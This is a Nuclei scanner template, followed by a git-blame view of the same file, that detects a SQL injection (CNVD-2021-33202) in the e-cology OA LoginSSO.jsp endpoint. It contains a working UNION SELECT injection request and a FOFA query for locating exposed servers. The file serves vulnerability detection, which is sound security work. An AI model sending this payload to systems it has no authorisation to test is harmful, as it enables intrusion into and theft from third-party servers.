nuclei-templates/http/cnvd/2021/CNVD-2021-33202.yaml

id: CNVD-2021-33202

info:
  name: OA E-Cology LoginSSO.jsp - SQL Injection
  author: SleepingBag945
  severity: high
  description: |
    e-cology is an OA office system specially produced for large and medium-sized enterprises. It supports simultaneous office work on PC, mobile and WeChat terminals. There is a SQL injection vulnerability in Panwei e-cology. An attacker could exploit this vulnerability to obtain sensitive information.
  reference:
    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20LoginSSO.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%20CNVD-2021-33202.md
    - https://www.cnblogs.com/0day-li/p/14637680.html
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="泛微-协同办公OA"
  tags: cnvd,cnvd2021,e-cology,sqli
variables:
  num: "999999999"

http:
  - raw:
      - |
        GET /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20md5({{num}})%20as%20id%20from%20HrmResourceManager HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5(num)}}'

      - type: status
        status:
          - 200

# digest: 4b0a00483046022100ad48adb20c4c9f6d9e6bf9f8c0c640310a50506546e93e68cdfbd505b31d7a87022100ad2a768b19fc657d09d9ef105527dcbbedc2ec6012f0defd7e73ed4aa859f7d5:922c64590222798bb761d5b6d8e72950
completed assigned templates 2023-09-13 11:22:00 +00:00			`id: CNVD-2021-33202`

			`info:`
			`name: OA E-Cology LoginSSO.jsp - SQL Injection`
			`author: SleepingBag945`
			`severity: high`
			`description: \|`
			`e-cology is an OA office system specially produced for large and medium-sized enterprises. It supports simultaneous office work on PC, mobile and WeChat terminals. There is a SQL injection vulnerability in Panwei e-cology. An attacker could exploit this vulnerability to obtain sensitive information.`
			`reference:`
			`- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20LoginSSO.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%20CNVD-2021-33202.md`
			`- https://www.cnblogs.com/0day-li/p/14637680.html`
			`metadata:`
			`verified: true`
templateman update 2023-10-14 11:27:55 +00:00			`max-request: 1`
completed assigned templates 2023-09-13 11:22:00 +00:00			`fofa-query: app="泛微-协同办公OA"`
			`tags: cnvd,cnvd2021,e-cology,sqli`
			`variables:`
			`num: "999999999"`

			`http:`
			`- raw:`
			`- \|`
			`GET /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20md5({{num}})%20as%20id%20from%20HrmResourceManager HTTP/1.1`
			`Host: {{Hostname}}`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- '{{md5(num)}}'`

			`- type: status`
			`status:`
templateman update 2023-10-14 11:27:55 +00:00			`- 200`
TemplateMan Update [Fri Oct 20 11:41:12 UTC 2023] :robot: 2023-10-20 11:41:13 +00:00
			`# digest: 4b0a00483046022100ad48adb20c4c9f6d9e6bf9f8c0c640310a50506546e93e68cdfbd505b31d7a87022100ad2a768b19fc657d09d9ef105527dcbbedc2ec6012f0defd7e73ed4aa859f7d5:922c64590222798bb761d5b6d8e72950`